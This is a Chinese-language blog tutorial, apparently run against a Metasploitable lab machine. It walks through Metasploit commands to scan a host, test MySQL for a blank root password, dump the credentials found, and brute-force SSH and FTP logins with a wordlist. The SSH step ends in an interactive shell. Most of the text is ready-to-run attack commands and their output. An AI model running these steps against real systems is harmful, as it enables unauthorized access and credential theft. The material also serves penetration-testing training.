Metasploit攻击实例(四)

1.1 Metasploit攻击实例

图片[1]|Metasploit攻击实例(四)|leon的博客

1.1.1 攻击空密码的mysql服务

1.1.1.1 扫描主机并导入metasploit

# nmap -A -T4 -v 192.168.1.120 -oX /tmp/192.168.1.120.xml
msf6 > db_import /tmp/192.168.1.120.xml
msf6 > hosts -R 192.168.1.120

图片[2]|Metasploit攻击实例(四)|leon的博客

msf6 > services -R 192.168.1.120

图片[3]|Metasploit攻击实例(四)|leon的博客

1.1.1.2 验证主机是否存在mysql空密码漏洞

msf6 > search mysql type:auxiliary

图片[4]|Metasploit攻击实例(四)|leon的博客

msf6 > use auxiliary/scanner/mysql/mysql_login
msf6 auxiliary(scanner/mysql/mysql_login) > show options

图片[5]|Metasploit攻击实例(四)|leon的博客

msf6 auxiliary(scanner/mysql/mysql_login) > set USERNAME root
USERNAME => root
msf6 auxiliary(scanner/mysql/mysql_login) > set BLANK_PASSWORDS true
BLANK_PASSWORDS => true
msf6 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.1.120
RHOSTS => 192.168.1.120
msf6 auxiliary(scanner/mysql/mysql_login) > run

图片[6]|Metasploit攻击实例(四)|leon的博客

1.1.1.3 获取数据库中所有凭证

msf6 auxiliary(scanner/mysql/mysql_login) > creds

图片[7]|Metasploit攻击实例(四)|leon的博客

1.1.1.4 导出扫描结果给其他metasploit使用

msf6 auxiliary(scanner/mysql/mysql_login) > db_export -f xml /tmp/192.168.1.120-mysql.xml
[*] Starting export of workspace default to /tmp/192.168.1.120-mysql.xml [ xml ]...
[*] Finished export of workspace default to /tmp/192.168.1.120-mysql.xml [ xml ]...

1.1.2 暴力破解SSH

1.1.2.1 对ssh进行暴力破解

msf6 > search ssh_login

图片[8]|Metasploit攻击实例(四)|leon的博客

msf6 > use 0
msf6 auxiliary(scanner/ssh/ssh_login) > show options

图片[9]|Metasploit攻击实例(四)|leon的博客

msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.1.120
RHOSTS => 192.168.1.120
msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf6 auxiliary(scanner/ssh/ssh_login) > exploit

图片[10]|Metasploit攻击实例(四)|leon的博客

1.1.2.2 破解后进行验证

msf6 auxiliary(scanner/ssh/ssh_login) > sessions

图片[11]|Metasploit攻击实例(四)|leon的博客

msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 8
[*] Starting interaction with 8...

whoami
msfadmin
ls
vulnerable
background

Background session 9? [y/N]  y

1.1.3 暴力破解FTP

1.1.3.1 对ftp进行暴力破解

msf6 > search ftp_login

图片[12]|Metasploit攻击实例(四)|leon的博客

msf6 > use 0
msf6 auxiliary(scanner/ftp/ftp_login) > show options

图片[13]|Metasploit攻击实例(四)|leon的博客

msf6 auxiliary(scanner/ftp/ftp_login) > set RHOSTS 192.168.1.120
RHOSTS => 192.168.1.120
msf6 auxiliary(scanner/ftp/ftp_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
msf6 auxiliary(scanner/ftp/ftp_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf6 auxiliary(scanner/ftp/ftp_login) > exploit

图片[14]|Metasploit攻击实例(四)|leon的博客

温馨提示:本文最后更新于2022-12-20 20:57:32,已超过436天没有更新。某些文章具有时效性,若文章内容或图片资源有错误或已失效,请联系站长。谢谢!
转载请注明本文链接:https://blog.leonshadow.cn/763482/2965.html
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享